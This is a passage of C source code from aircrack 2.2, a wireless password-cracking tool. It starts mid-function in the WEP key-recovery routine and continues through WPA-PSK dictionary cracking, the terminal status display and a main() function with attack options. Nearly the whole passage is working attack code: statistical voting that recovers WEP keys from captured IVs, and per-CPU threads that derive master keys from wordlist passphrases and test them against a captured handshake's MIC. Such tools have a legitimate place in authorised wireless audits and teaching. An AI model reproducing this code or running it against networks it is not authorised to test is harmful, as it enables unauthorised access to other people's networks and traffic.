            while( ap != NULL )
            {
                if( ap->crypt == 2 && ap->target )
                {
                    wep.ivbuf  = ap->ivbuf;
                    wep.nb_ivs = ap->nb_ivs;
                    break;
                }

                ap = ap->next;
            }
        }
        else
        {
            /* one buffer to rule them all */

            if( wep.ivbuf != NULL )
            {
                free( wep.ivbuf );
                wep.ivbuf = NULL;
            }

            wep.nb_ivs = 0;

            ap = ap_1st;

            while( ap != NULL )
            {
                if( ap->crypt == 2 && ap->target )
                {
                    n = ap->nb_ivs;

                    if( ( wep.ivbuf = realloc( wep.ivbuf,
                            ( wep.nb_ivs + n ) * 5 ) ) == NULL )
                    {
                        perror( "realloc failed" );
                        return( FAILURE );
                    }

                    memcpy( wep.ivbuf + wep.nb_ivs * 5, ap->ivbuf, 5 * n );

                    wep.nb_ivs += n;
                }

                ap = ap->next;
            }
        }

        if( B > 0 )
            return( RESTART );
    }

    /* send the current keybyte # to each thread */

    for( cid = 0; cid < opt.nbcpu; cid++ )
    {
        n = sizeof( int );

        if( safe_write( mc_pipe[cid][1], &B, n ) != n )
        {
            perror( "write failed" );
            return( FAILURE );
        }
    }

    /* collect the poll results */

    for( i = 0; i < 256; i++ )
    {
        wep.poll[B][i].idx = i;
        wep.poll[B][i].val = 0;
    }

    for( cid = 0; cid < opt.nbcpu; cid++ )
    {
        n = sizeof( votes );

        if( safe_read( cm_pipe[cid][0], votes, n ) != n )
        {
            perror( "read failed" );
            return( FAILURE );
        }

        for( n = 0, vi = (int *) votes; n < N_ATTACKS; n++ )
            for( i = 0; i < 256; i++, vi++ )
                wep.poll[B][i].val += *vi * K_COEFF[n];
    }

    /* set votes to the max if the keybyte is user-defined */

    if( B < opt.debug[0] )
        wep.poll[B][opt.debug[1 + B]].val = 32767;

    /* sort the votes, highest ones first */

    qsort( wep.poll[B], 256, sizeof( vote ), cmp_votes );

    /* fudge threshold = higest vote divided by fudge factor */

    for( wep.fudge[B] = 1; wep.fudge[B] < 256; wep.fudge[B]++ )
        if( wep.poll[B][wep.fudge[B]].val < wep.poll[B][0].val / opt.ffact )
            break;

    /* try the most likely n votes, where n is the fudge threshold */

    for( wep.depth[B] = 0; wep.depth[B] < wep.fudge[B]; wep.depth[B]++ )
    {
        wep.key[B] = wep.poll[B][wep.depth[B]].idx;

        if( ! opt.is_quiet )
            show_wep_stats( B, 0 );

        if( B == 4 && opt.keylen == 13 )
        {
            /* even when cracking 104-bit WEP, *
             * check if the 40-bit key matches */

            opt.keylen = 5;

            if( check_wep_key() == SUCCESS )
                goto keyfound;

            opt.keylen = 13;
        }

        switch( do_wep_crack( B + 1 ) )
        {
            case SUCCESS: return( SUCCESS );
            case RESTART: return( RESTART );
            default: break;
        }
    }

    if( B == 0 )
        printf( "   Attack failed. Possible reasons:\n\n"
"     * Not enough IVs available. You need about 250.000 IVs to crack\n"
"       40-bit WEP, and more than 700.000 IVs to crack a 104-bit key.\n"
"     * If all votes seem to be more or less equal (no clear winner),\n"
"       then the capture file is corrupted, or the key is not static.\n"
"     * A false positive prevented the key from being found.  Try to\n"
"       disable each attack (-k 1 .. 17), or raise the fudge factor.\n" );

    return( FAILURE );
}

/* derive the PMK from the passphrase and the essid */

void calc_pmk( uchar *key, uchar pmk[40], uchar *essid, int slen )
{
    int i, j;
    uchar buffer[64];
    sha1_context ctx_ipad;
    sha1_context ctx_opad;
    sha1_context sha1_ctx;

    /* setup the inner and outer contexts */

    memset( buffer, 0, 64 );
    strcpy( buffer, key );

    for( i = 0; i < 64; i++ )
        buffer[i] ^= 0x36;

    sha1_starts( &ctx_ipad );
    sha1_update( &ctx_ipad, buffer, 64 );

    for( i = 0; i < 64; i++ )
        buffer[i] ^= 0x6A;

    sha1_starts( &ctx_opad );
    sha1_update( &ctx_opad, buffer, 64 );

    /* iterate HMAC-SHA1 over itself 8192 times */

    essid[slen - 1] = '\1';
    hmac_sha1( key, strlen( key ), essid, slen, pmk );
    memcpy( buffer, pmk, 20 );

    for( i = 1; i < 4096; i++ )
    {
        memcpy( &sha1_ctx, &ctx_ipad, sizeof( sha1_ctx ) );
        sha1_update( &sha1_ctx, buffer, 20 );
        sha1_finish( &sha1_ctx, buffer );

        memcpy( &sha1_ctx, &ctx_opad, sizeof( sha1_ctx ) );
        sha1_update( &sha1_ctx, buffer, 20 );
        sha1_finish( &sha1_ctx, buffer );

        for( j = 0; j < 20; j++ )
            pmk[j] ^= buffer[j];
    }

    essid[slen - 1] = '\2';
    hmac_sha1( key, strlen( key ), essid, slen, pmk + 20 );
    memcpy( buffer, pmk + 20, 20 );

    for( i = 1; i < 4096; i++ )
    {
        memcpy( &sha1_ctx, &ctx_ipad, sizeof( sha1_ctx ) );
        sha1_update( &sha1_ctx, buffer, 20 );
        sha1_finish( &sha1_ctx, buffer );

        memcpy( &sha1_ctx, &ctx_opad, sizeof( sha1_ctx ) );
        sha1_update( &sha1_ctx, buffer, 20 );
        sha1_finish( &sha1_ctx, buffer );

        for( j = 0; j < 20; j++ )
            pmk[j + 20] ^= buffer[j];
    }
}

/* each thread computes two pairwise master keys at a time */

int crack_wpa_thread( void *arg )
{
    uchar essid[36];
    uchar key1[128], pmk1[40];
    uchar key2[128], pmk2[40];

#ifdef __i386__

    uchar k_ipad[128], ctx_ipad[40];
    uchar k_opad[128], ctx_opad[40];
    uchar buffer[128], sha1_ctx[40];
    uchar wrkbuf[640];
    uint i, *u, *v, *w;

#endif

    int slen, cid = (long) arg;

    /* receive the essid */

    memset( essid, 0, sizeof( essid ) );

    if( safe_read( mc_pipe[cid][0], (void *) essid, 32 ) != 32 )
    {
        perror( "read failed" );
        kill( 0, SIGTERM );
        _exit( FAILURE );
    }

    slen = strlen( essid ) + 4;

    while( 1 )
    {
        /* receive two passphrases */

        memset( key1, 0, sizeof( key1 ) );
        memset( key2, 0, sizeof( key2 ) );

        if( safe_read( mc_pipe[cid][0], (void *) key1, 128 ) != 128 ||
            safe_read( mc_pipe[cid][0], (void *) key2, 128 ) != 128 )
        {
            perror( "read passphrase failed" );
            kill( 0, SIGTERM );
            _exit( FAILURE );
        }

        key1[127] = '\0';
        key2[127] = '\0';

#ifdef __i386__

        /* MMX available, so compute two PMKs in a single row */

        memset( k_ipad, 0, sizeof( k_ipad ) );
        memset( k_opad, 0, sizeof( k_opad ) );

        memcpy( k_ipad, key1, strlen( key1 ) );
        memcpy( k_opad, key1, strlen( key1 ) );

        memcpy( k_ipad + 64, key2, strlen( key2 ) );
        memcpy( k_opad + 64, key2, strlen( key2 ) );

        u = (uint *) ( k_ipad      );
        v = (uint *) ( k_ipad + 64 );
        w = (uint *) buffer;

        for( i = 0; i < 16; i++ )
        {
            /* interleave the data */

            *w++ = *u++ ^ 0x36363636;
            *w++ = *v++ ^ 0x36363636;
        }

        shammx_init( ctx_ipad );
        shammx_data( ctx_ipad, buffer, wrkbuf );

        u = (uint *) ( k_opad      );
        v = (uint *) ( k_opad + 64 );
        w = (uint *) buffer;

        for( i = 0; i < 16; i++ )
        {
            *w++ = *u++ ^ 0x5C5C5C5C;
            *w++ = *v++ ^ 0x5C5C5C5C;
        }

        shammx_init( ctx_opad );
        shammx_data( ctx_opad, buffer, wrkbuf );

        memset( buffer, 0, sizeof( buffer ) );

        /* use the buffer, luke */

        buffer[ 40] = buffer[ 44] = 0x80;
        buffer[122] = buffer[126] = 0x02;
        buffer[123] = buffer[127] = 0xA0;

        essid[slen - 1] = '\1';

        hmac_sha1( key1, strlen( key1 ), essid, slen, pmk1 );
        hmac_sha1( key2, strlen( key2 ), essid, slen, pmk2 );

        u = (uint *) pmk1;
        v = (uint *) pmk2;
        w = (uint *) buffer;

        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;

        for( i = 1; i < 4096; i++ )
        {
            memcpy( sha1_ctx, ctx_ipad, 40 );
            shammx_data( sha1_ctx, buffer, wrkbuf );
            shammx_ends( sha1_ctx, buffer );

            memcpy( sha1_ctx, ctx_opad, 40 );
            shammx_data( sha1_ctx, buffer, wrkbuf );
            shammx_ends( sha1_ctx, buffer );

            u = (uint *) pmk1;
            v = (uint *) pmk2;
            w = (uint *) buffer;

            /* de-interleave the digests */

            *u++ ^= *w++; *v++ ^= *w++;
            *u++ ^= *w++; *v++ ^= *w++;
            *u++ ^= *w++; *v++ ^= *w++;
            *u++ ^= *w++; *v++ ^= *w++;
            *u++ ^= *w++; *v++ ^= *w++;
        }

        essid[slen - 1] = '\2';

        hmac_sha1( key1, strlen( key1 ), essid, slen, pmk1 + 20 );
        hmac_sha1( key2, strlen( key2 ), essid, slen, pmk2 + 20 );

        u = (uint *) ( pmk1 + 20 );
        v = (uint *) ( pmk2 + 20 );
        w = (uint *) buffer;

        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;
        *w++ = *u++; *w++ = *v++;

        for( i = 1; i < 4096; i++ )
        {
            memcpy( sha1_ctx, ctx_ipad, 40 );
            shammx_data( sha1_ctx, buffer, wrkbuf );
            shammx_ends( sha1_ctx, buffer );

            memcpy( sha1_ctx, ctx_opad, 40 );
            shammx_data( sha1_ctx, buffer, wrkbuf );
            shammx_ends( sha1_ctx, buffer );

            u = (uint *) ( pmk1 + 20 );
            v = (uint *) ( pmk2 + 20 );
            w = (uint *) buffer;

            *u++ ^= *w++; *v++ ^= *w++;
            *u++ ^= *w++; *v++ ^= *w++;
            *u++ ^= *w++; *v++ ^= *w++;
        }

#else

        /* not x86, use the generic SHA-1 C code */

        calc_pmk( key1, pmk1, essid, slen );
        calc_pmk( key2, pmk2, essid, slen );

#endif

        /* send the passphrase & master keys */

        if( safe_write( cm_pipe[cid][1], (void *) key1, 128 ) != 128 ||
            safe_write( cm_pipe[cid][1], (void *) key2, 128 ) != 128 ||
            safe_write( cm_pipe[cid][1], (void *) pmk1,  32 ) !=  32 ||
            safe_write( cm_pipe[cid][1], (void *) pmk2,  32 ) !=  32 )
        {
            perror( "write pmk failed" );
            kill( 0, SIGTERM );
            _exit( FAILURE );
        }
    }
}

/* display the current wpa key info, matrix-like */

void show_wpa_stats( uchar *key, uchar pmk[32], uchar ptk[64],
                     uchar mic[16], int force )
{
    float delta;
    int i, et_h, et_m, et_s;

#ifdef __i386__
    __asm__( "emms" );      /* clean up the fp regs */
#endif

    if( chrono( &t_stats, 0 ) < 0.05 && force == 0 )
        return;

    chrono( &t_stats, 1 );

    delta = chrono( &t_begin, 0 );

    et_h =   delta / 3600;
    et_m = ( delta - et_h * 3600 ) / 60;
    et_s =   delta - et_h * 3600 - et_m * 60;

    if( ( delta = chrono( &t_kprev, 0 ) ) >= 6 )
    {
        t_kprev.tv_sec += 3;
        nb_kprev /= 2;
    }

    if( opt.l33t ) printf( "\33[33;1m" );
    printf( "\33[5;20H[%02d:%02d:%02d] %ld keys tested "
            "(%2.2f k/s)", et_h, et_m, et_s,
            nb_tried, (float) nb_kprev / delta );

    if( opt.l33t ) printf( "\33[37;1m" );
    printf( "\33[8;24HCurrent passphrase: %s\33[K\n", key );

    if( opt.l33t ) printf( "\33[32;22m" );
    printf( "\33[11;9HMaster Key   : " );

    if( opt.l33t ) printf( "\33[32;1m" );
    for( i = 0; i < 32; i++ )
    {
        if( i == 16 ) printf( "\n\33[23C" );
        printf( "%02X ", pmk[i] );
    }

    if( opt.l33t ) printf( "\33[32;22m" );
    printf( "\33[14;9HTemporal Key : " );

    if( opt.l33t ) printf( "\33[32;1m" );
    for( i = 0; i < 64; i++ )
    {
        if( i > 0 && i % 16 == 0 ) printf( "\n\33[23C" );
        printf( "%02X ", ptk[i] );
    }

    if( opt.l33t ) printf( "\33[32;22m" );
    printf( "\33[19;9HEAPOL HMAC   : " );

    if( opt.l33t ) printf( "\33[32;1m" );
    for( i = 0; i < 16; i++ )
        printf( "%02X ", mic[i] );

    printf( "\n" );
}

int do_wpa_crack( struct WPA_data *wpa )
{
    int i, cid;

    uchar pke[100];
    uchar pmk1[32], ptk1[80];
    uchar pmk2[32], ptk2[80];
    uchar key1[128], mic1[16];
    uchar key2[128], mic2[16];

    /* send the ESSID to each thread */

    for( cid = 0; cid < opt.nbcpu; cid++ )
    {
        if( safe_write( mc_pipe[cid][1], (void *) wpa->essid, 32 ) != 32 )
        {
            perror( "write essid failed" );
            kill( 0, SIGTERM );
            _exit( FAILURE );
        }
    }

    /* pre-compute the key expansion buffer */

    memcpy( pke, "Pairwise key expansion", 23 );

    if( memcmp( wpa->stmac, wpa->bssid, 6 ) < 0 )
    {
        memcpy( pke + 23, wpa->stmac, 6 );
        memcpy( pke + 29, wpa->bssid, 6 );
    }
    else
    {
        memcpy( pke + 23, wpa->bssid, 6 );
        memcpy( pke + 29, wpa->stmac, 6 );
    }

    if( memcmp( wpa->snonce, wpa->anonce, 32 ) < 0 )
    {
        memcpy( pke + 35, wpa->snonce, 32 );
        memcpy( pke + 67, wpa->anonce, 32 );
    }
    else
    {
        memcpy( pke + 35, wpa->anonce, 32 );
        memcpy( pke + 67, wpa->snonce, 32 );
    }

    memset( key1, 0, sizeof( key1 ) );
    memset( key2, 0, sizeof( key1 ) );

    if( ! opt.is_quiet )
    {
//        if( opt.l33t )
//            printf( "\33[37;40m" );

        printf( "\33[2J" );

        if( opt.l33t )
            printf( "\33[34;1m" );

        printf( "\33[2;34Haircrack 2.2" );
    }

    while( 1 )
    {
        for( cid = 0; cid < opt.nbcpu; cid++ )
        {
            /* read a couple of keys (skip those < 8 chars) */

            do
            {
                if( fgets( key1, sizeof( key1 ), opt.dict ) == NULL )
                {
                    if( opt.l33t )
                        printf( "\33[32;22m" );

                    printf( "\nEOF\n" );

                    return( FAILURE );
                }

                i = strlen( key1 );

                if( key1[i - 1] == '\n' ) key1[--i] = '\0';
                if( key1[i - 1] == '\r' ) key1[--i] = '\0';
            }
            while( i < 8 );

            do
            {
                if( fgets( key2, sizeof( key2 ), opt.dict ) == NULL )
                    break;

                i = strlen( key2 );

                if( key2[i - 1] == '\n' ) key2[--i] = '\0';
                if( key2[i - 1] == '\r' ) key2[--i] = '\0';
            }
            while( i < 8 );

            /* send the keys */

            if( safe_write( mc_pipe[cid][1], (void *) key1, 128 ) != 128 ||
                safe_write( mc_pipe[cid][1], (void *) key2, 128 ) != 128 )
            {
                perror( "write passphrase failed" );
                return( FAILURE );
            }
        }

        for( cid = 0; cid < opt.nbcpu; cid++ )
        {
            /* collect and test the master keys */

            if( safe_read( cm_pipe[cid][0], (void *) key1, 128 ) != 128 ||
                safe_read( cm_pipe[cid][0], (void *) key2, 128 ) != 128 ||
                safe_read( cm_pipe[cid][0], (void *) pmk1,  32 ) !=  32 ||
                safe_read( cm_pipe[cid][0], (void *) pmk2,  32 ) !=  32 )
            {
                perror( "read pmk failed" );
                return( FAILURE );
            }

            /* compute the pairwise transient key and the frame MIC */

            for( i = 0; i < 4; i++ )
            {
                pke[99] = i;
                hmac_sha1( pmk1, 32, pke, 100, ptk1 + i * 20 );
                hmac_sha1( pmk2, 32, pke, 100, ptk2 + i * 20 );
            }

            switch( wpa->flags & 0x07 )
            {
                case 1:
                    hmac_md5( ptk1, 16, wpa->eapol, wpa->eapol_size, mic1 );
                    hmac_md5( ptk2, 16, wpa->eapol, wpa->eapol_size, mic2 );
                    break;

                default:
                    hmac_sha1( ptk1, 16, wpa->eapol, wpa->eapol_size, mic1 );
                    hmac_sha1( ptk2, 16, wpa->eapol, wpa->eapol_size, mic2 );
                    break;
            }

            if( memcmp( mic1, wpa->keymic, 16 ) == 0 )
            {
                memcpy( key2, key1, 128 );
                memcpy( pmk2, pmk1,  32 );
                memcpy( ptk2, ptk1,  64 );
                memcpy( mic2, mic1,  16 );
            }

            if( memcmp( mic2, wpa->keymic, 16 ) == 0 )
            {
                if( opt.is_quiet )
                {
                    printf( "KEY FOUND! [ %s ]\n", key2 );
                    return( SUCCESS );
                }

                show_wpa_stats( key2, pmk2, ptk2, mic2, 1 );

                if( opt.l33t )
                    printf( "\33[31;1m" );

                printf( "\33[8;%dH\33[2KKEY FOUND! [ %s ]\33[11B\n",
                        ( 80 - 15 - (int) strlen( key2 ) ) / 2, key2 );

                if( opt.l33t )
                    printf( "\33[32;22m" );

                return( SUCCESS );
            }

            nb_tried += 2;
            nb_kprev += 2;

            if( ! opt.is_quiet )
                show_wpa_stats( key1, pmk1, ptk1, mic1, 0 );
        }
    }

    return( FAILURE );
}

int intr_read = 0;

void sighandler( int signum )
{
    signal( signum, sighandler );

    if( signum == SIGQUIT )
        _exit( SUCCESS );

    if( signum == SIGTERM )
        _exit( SUCCESS );

    if( signum == SIGINT )
        intr_read++;

    if( signum == SIGWINCH )
        printf( "\33[2J\n" );
}

char usage[] =

"\n"
"  aircrack 2.2 - (C) 2004,2005 Christophe Devine\n"
"\n"
"  usage: aircrack [options] <.cap / .ivs file(s)>\n"
"\n"
"  Common options:\n"
"\n"
"      -a <amode> : set attack mode (1: WEP, 2: WPA-PSK)\n"
"      -e <essid> : target selection: network identifier\n"
"      -b <bssid> : target selection: access point's MAC\n"
"      -p <nbcpu> : SMP support: # of processes to start\n"
"      -q         : enable quiet mode (no status output)\n"
"\n"
"  Static WEP cracking options:\n"
"\n"
"      -d <start> : debug - specify beginning of the key\n"
"      -m <maddr> : MAC address to filter usable packets\n"
"      -n <nbits> : WEP key length: 64 / 128 / 256 / 512\n"
"      -i <index> : WEP key index (1 to 4), default: any\n"
"      -f <fudge> : bruteforce fudge factor,  default: 2\n"
"      -k <korek> : disable one attack method  (1 to 17)\n"
"\n"
"  WPA-PSK cracking options:\n"
"\n"
"      -w <words> : path to dictionary file\n"
"\n";

int main( int argc, char *argv[] )
{
    int i, n, ret;
    uchar *s, buf[128];
    struct AP_data *ap;
    struct WPA_data *wpa;

    ret = FAILURE;

    /* check the arguments */

    if( argc < 2 )
    {
    usage:
        printf( usage );
        return( ret );
    }

    memset( &opt, 0, sizeof( opt ) );

    opt.nbcpu   =  1;
    opt.ffact   =  2;
    opt.korek   =  0;
    opt.keylen  = 13;

    while( 1 )
    {
        int option = getopt( argc, argv, "a:e:b:p:qd:m:n:i:f:k:w:0" );

        if( option < 0 ) break;

        switch( option )
        {
            case 'a' :

                sscanf( optarg, "%d", &opt.amode );

                if( opt.amode != 1 && opt.amode != 2 )
                {
                    printf( "Invalid attack mode.\n" );
                    return( FAILURE );
                }

                break;

            case 'e' :

                strncpy( opt.essid, optarg, 32 );
                opt.essid_set = 1;
                break;

            case 'b' :

                i = 0;
                s = optarg;

                while( sscanf( s, "%x", &n ) == 1 )
                {
                    if( n < 0 || n > 255 )
                    {
                        printf( "Invalid BSSID (not a MAC).\n" );
                        return( FAILURE );
                    }

                    opt.bssid[i] = n;

                    if( ++i > 6 ) break;

                    if( ! ( s = strchr( s, ':' ) ) )
                        break;

                    s++;
                }

                if( i != 6 )
                {
                    printf( "Invalid BSSID (not a MAC).\n" );
                    return( FAILURE );
                }

                opt.bssid_set = 1;
                break;

            case 'p' :

                if( sscanf( optarg, "%d", &opt.nbcpu ) != 1 ||
                    opt.nbcpu < 1 || opt.nbcpu > 256 )
                {
                    printf( "Invalid number of processes.\n" );
                    return( FAILURE );
                }

                break;

            case 'q' :

                opt.is_quiet = 1;

                break;

            case 'd' :

                i = 1;
                s = optarg;

                buf[0] = s[0];
                buf[1] = s[1];
                buf[2] = '\0';

                while( sscanf( buf, "%x", &n ) == 1 )
                {
                    if( n < 0 || n > 255 )
                    {
                        printf( "Invalid debug key.\n" );
                        return( FAILURE );
                    }

                    opt.debug[i++] = n;

                    if( i >= 62 ) break;

                    s += 2;

                    if( s[0] == ':' || s[0] == '-' )
                        s++;

                    if( s[0] == '\0' || s[1] == '\0' )
                        break;
                    
                    buf[0] = s[0];
                    buf[1] = s[1];
                }

                if( i == 0 )
                {
                    printf( "Invalid debug key.\n" );
                    return( FAILURE );
                }

                opt.debug[0] = i - 1;
                break;

            case 'm' :

                i = 0;
                s = optarg;

                while( sscanf( s, "%x", &n ) == 1 )
                {
                    if( n < 0 || n > 255 )
                    {
                        printf( "Invalid MAC address filter.\n" );
                        return( FAILURE );
                    }

                    opt.maddr[i] = n;

                    if( ++i > 6 ) break;

                    if( ! ( s = strchr( s, ':' ) ) )
                        break;

                    s++;
                }

                if( i != 6 )
                {
                    printf( "Invalid MAC address filter.\n" );
                    return( FAILURE );
                }

                break;

            case 'n' :

                if( sscanf( optarg, "%d", &opt.keylen ) != 1 ||
                    ( opt.keylen !=  64 && opt.keylen != 128 &&
                      opt.keylen != 256 && opt.keylen != 512 ) )
                {
                    printf( "Invalid WEP key length.\n" );
                    return( FAILURE );
                }

                opt.keylen = ( opt.keylen / 8 ) - 3;

                break;

            case 'i' :

                if( sscanf( optarg, "%d", &opt.index ) != 1 ||
                    opt.index < 1 || opt.index > 4 )
                {
                    printf( "Invalid WEP key index.\n" );
                    return( FAILURE );
                }

                break;

            case 'f' :

                if( sscanf( optarg, "%d", &opt.ffact ) != 1 ||
                    opt.ffact < 1 || opt.ffact > 8 )
                {
                    printf( "Invalid fudge factor.\n" );
                    return( FAILURE );
                }

                break;

            case 'k' :

                if( sscanf( optarg, "%d", &opt.korek ) != 1 ||
                    opt.korek < 0 || opt.korek > N_ATTACKS )
                {
                    printf( "Invalid KoreK attack strategy.\n" );
                    return( FAILURE );
                }

                K_COEFF[opt.korek] = 0;

                break;

            case 'w' :

                if( strcmp( optarg, "-" ) == 0 )
                {
                    if( ( opt.dict = fdopen( 0, "r" ) ) == NULL )
                    {
                        perror( "fopen(dictionary) failed" );
                        return( FAILURE );
                    }

                    opt.no_stdin = 1;
                }
                else
                {
                    if( ( opt.dict = fopen( optarg, "r" ) ) == NULL )
                    {
                        perror( "fopen(dictionary) failed" );
                        return( FAILURE );
                    }
                }

                break;

            case '0' :

                opt.l33t = 1;
                break;

            default : goto usage;
        }
    }

    if( ! ( argc - optind ) )
        goto usage;

    /* start one thread per input file */

    signal( SIGINT,  sighandler );
    signal( SIGQUIT, sighandler );
    signal( SIGTERM, sighandler );

    pthread_mutex_init( &mx_apl, NULL );
    pthread_mutex_init( &mx_eof, NULL );
    pthread_cond_init(  &cv_eof, NULL );

    ap_1st = NULL;

    n = argc - optind;

    do
    {
        pthread_t tid;

        if( strcmp( argv[optind], "-" ) == 0 )
            opt.no_stdin = 1;

        if( pthread_create( &tid, NULL, (void *) read_thread,
                            (void *) argv[optind] ) != 0 )
        {
            perror( "pthread_create failed" );
            goto exit_main;
        }

        usleep( 131071 );
    }
    while( ++optind < argc );

    /* wait until each thread reaches EOF */

    pthread_mutex_lock( &mx_eof );

    if( ! opt.is_quiet )
    {
        printf( "Reading packets, please wait..." );
        fflush( stdout );
    }

    while( nb_eof < n && ! intr_read )
        pthread_cond_wait( &cv_eof, &mx_eof );

    pthread_mutex_unlock( &mx_eof );

    if( ! opt.is_quiet )
        printf( "\r\33[KRead %ld packets.\n", nb_pkt );

    signal( SIGINT, SIG_DFL );

    if( ! opt.is_quiet )
        printf( "\n" );

    if( ap_1st == NULL )
    {
        printf( "No networks found, exiting.\n" );
        goto exit_main;
    }

    if( ! opt.essid_set && ! opt.bssid_set )
    {
        /* ask the user which network is to be cracked */

        if( opt.is_quiet || opt.no_stdin )
        {
            printf( "Please specify an ESSID or BSSID.\n" );
            goto exit_main;
        }

        printf( "   #  BSSID%14sESSID%21sEncryption\n\n", "", "" );

        i = 1;

        ap = ap_1st;

        while( ap != NULL )
        {
            printf( "%4d  %02X:%02X:%02X:%02X:%02X:%02X  %-24s  ",
                    i, ap->bssid[0], ap->bssid[1],
                       ap->bssid[2], ap->bssid[3],
                       ap->bssid[4], ap->bssid[5],
                    ap->essid );

            if( ap->eapol )
                printf( "EAPOL+" );

            switch( ap->crypt )
            {
                case  0: printf( "None (%d.%d.%d.%d)\n",
                                 ap->lanip[0], ap->lanip[1],
                                 ap->lanip[2], ap->lanip[3] );
                         break;

                case  1: printf( "No data - WEP or WPA\n" );
                         break;

                case  2: printf( "WEP (%ld IVs)\n",
                                 ap->nb_ivs ); 
                         break;

                case  3:
                {
                    n = 0;
                    wpa = ap->wpa_1st;

                    while( wpa != NULL )
                    {
                        if( ( wpa->flags & 0x38 ) == 0x38 ) n++;
                        wpa = wpa->next;
                    }

                    printf( "WPA (%d handshake%c)\n",
                            n, ( n != 1 ) ? 's' : '\0' );
                    break;
                }

                default: printf( "Unknown\n" );
                         break;
            }

            i++; ap = ap->next;
        }

        printf( "\n" );

        if( ap_1st->next != NULL )
        {
            do
            {
                printf( "Index number of target network ? " );
                fflush( stdout );
                scanf( "%127s", buf );

                if( ( n = atoi( buf ) ) < 1 )
                    continue;

                i = 1; ap = ap_1st;
                while( ap != NULL && i < n )
                    { i++; ap = ap->next; }
            }
            while( n < 0 || ap == NULL );
        }
        else
        {
            printf( "Choosing first network as target.\n" );
            ap = ap_1st;
        }

        printf( "\n" );

        memcpy( opt.bssid, ap->bssid,  6 );
        opt.bssid_set = 1;
    }

    /* mark the targeted access point(s) */

    ap = ap_1st;

    while( ap != NULL )
    {
        if( memcmp( opt.maddr, BROADCAST, 6 ) == 0 ||
            ( opt.bssid_set && ! memcmp( opt.bssid, ap->bssid, 6 ) ) ||
            ( opt.essid_set && ! strcmp( opt.essid, ap->essid    ) ) )
            ap->target = 1;

        ap = ap->next;
    }

    ap = ap_1st;

    while( ap != NULL )
    {
        if( ap->target )
            break;

        ap = ap->next;
    }

    if( ap == NULL )
    {
        printf( "No matching network found - check your %s.\n",
                ( opt.essid_set ) ? "essid" : "bssid" );

        goto exit_main;
    }

    /* create the cracker<->master communication pipes */

    for( i = 0; i < opt.nbcpu; i++ )
    {
        pipe( mc_pipe[i] );
        pipe( cm_pipe[i] );
    }

    /* launch the attack */

    nb_tried = 0;
    nb_kprev = 0;

    chrono( &t_begin, 1 );
    chrono( &t_stats, 1 );
    chrono( &t_kprev, 1 );

    signal( SIGWINCH, sighandler );

    if( opt.amode == 1 || ap->crypt == 2 )
    {
        memset( &wep, 0, sizeof( wep ) );

        for( i = 0; i < opt.nbcpu; i++ )
        {
            /* start one thread per cpu */

            pthread_t tid;

            if( pthread_create( &tid, NULL, (void *) crack_wep_thread,
                                (void *) (long) i ) != 0 )
            {
                perror( "pthread_create failed" );
                goto exit_main;
            }
        }

        if( ! opt.is_quiet )
        {
            if( opt.l33t )
                printf( "\33[40m" );

            printf( "\33[2J" );
        }

        do { ret = do_wep_crack( 0 ); } while( ret == RESTART );
    }

    if( opt.amode == 2 || ap->crypt == 3 )
    {
        if( opt.dict == NULL )
        {
            printf( "Please specify a dictionary (option -w).\n" );
            goto exit_main;
        }

        /* parse the supplicant list to find an usable handshake */

        wpa = NULL;

        ap = ap_1st;

        while( ap != NULL )
        {
            if( ap->target == 0 || ap->crypt != 3 )
            {
                ap = ap->next;
                continue;
            }

            wpa = ap->wpa_1st;

            while( wpa != NULL )
            {
                if( ( wpa->flags & 0x38 ) == 0x38 )
                {
                    if( ( wpa->flags & 0x07 ) == 0x01 ||
                        ( wpa->flags & 0x07 ) == 0x02 )
                        break;

                        printf( "FIXME: unsupported WPA MIC type %d.\n",
                                wpa->flags & 0x07 );
                }

                wpa = wpa->next;
            }

            if( wpa != NULL )
                break;

            ap = ap->next;
        }

        if( wpa == NULL )
        {
            printf( "Found no valid WPA handshakes.\n" );
            goto exit_main;
        }

        if( memcmp( ap->essid, ZERO, 32 ) == 0 && ! opt.essid_set )
        {
            printf( "An ESSID is required. Try -e.\n" );
            goto exit_main;
        }

        if( opt.essid_set )
            strncpy( wpa->essid, opt.essid, 32 );
        else
            strncpy( wpa->essid, ap->essid, 32 );

        for( i = 0; i < opt.nbcpu; i++ )
        {
            /* start one thread per cpu */

            pthread_t tid;

            if( pthread_create( &tid, NULL, (void *) crack_wpa_thread,
                                (void *) (long) i ) != 0 )
            {
                perror( "pthread_create failed" );
                goto exit_main;
            }
        }

        ret = do_wpa_crack( wpa );
    }

    if( opt.amode == 0 && ap->crypt < 2 )
    {
        switch( ap->crypt )
        {
            case  0:
                printf( "Target network doesn't seem encrypted.\n" );
                break;

            default:
                printf( "Not enough data to attack target network.\n" );
                break;
        }
    }

exit_main:

    if( ! opt.is_quiet )
        printf( "\n" );

    if( ret == FAILURE ) kill( 0, SIGTERM );
    if( ret == SUCCESS ) kill( 0, SIGQUIT );

    _exit( ret );
}
